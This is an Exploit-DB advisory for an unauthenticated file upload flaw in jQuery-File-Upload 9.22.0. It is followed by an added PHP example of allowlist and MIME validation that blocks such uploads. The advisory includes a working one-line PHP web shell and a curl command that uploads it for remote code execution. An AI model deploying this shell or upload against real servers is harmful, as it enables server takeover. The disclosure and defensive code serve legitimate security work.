jQuery-File-Upload 9.22.0 - Arbitrary File Upload

EDB-ID: 45584
Author: Larry W. Cashdollar
Published: 2018-10-11
CVE: N/A
Type: Webapps
Platform: PHP
Vulnerable App: N/A

# Author: Larry W. Cashdollar, @_larry0
# Date: 2018-10-09
# Vendor: https://github.com/blueimp
# Download Site: https://github.com/blueimp/jQuery-File-Upload/releases
# CVE-ID: N/A

# Vulnerability:
# The code in https://github.com/blueimp/jQuery-File-Upload/blob/master/server/php/UploadHandler.php
# doesn't require any validation to upload files to the server. It also doesn't exclude file types.
# This allows for remote code execution.

# shell.php:
<?php $cmd=$_GET['cmd']; system($cmd);?>

# Exploit Code:
$ curl -F "[email protected]" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php
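
# Added example (not part of the original advisory and not blueimp's code): the server-side
# checks whose absence is described under "Vulnerability" above, so that a file such as shell.php is rejected.
# store_upload(), ALLOWED_TYPES and $storeDir are hypothetical names; $storeDir is assumed to be a directory outside the web root.

```php
<?php
// Added example: hypothetical helper, not code from jQuery-File-Upload.

const ALLOWED_TYPES = [            // extension => expected MIME type
    'gif'  => 'image/gif',
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
];

/**
 * Validate one entry of $_FILES and move it into $storeDir.
 * Returns the stored file name; throws on any rejected upload.
 * Assumption: $storeDir is outside the web root, so stored files are
 * never handed to the PHP interpreter by the web server.
 */
function store_upload(array $file, string $storeDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed or not an HTTP upload');
    }

    // 1. Extension allowlist on the client-supplied name: "shell.php" stops here.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED_TYPES[$ext])) {
        throw new RuntimeException("extension not allowed: .$ext");
    }

    // 2. Content check: the sniffed MIME type must match the extension,
    //    so PHP source renamed to "shell.png" is rejected as well.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED_TYPES[$ext]) {
        throw new RuntimeException("content type mismatch: $mime");
    }

    // 3. Server-chosen random name: the client never controls the stored
    //    path, and double extensions such as "x.php.png" disappear.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], "$storeDir/$name")) {
        throw new RuntimeException('could not store upload');
    }
    return $name;
}
```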
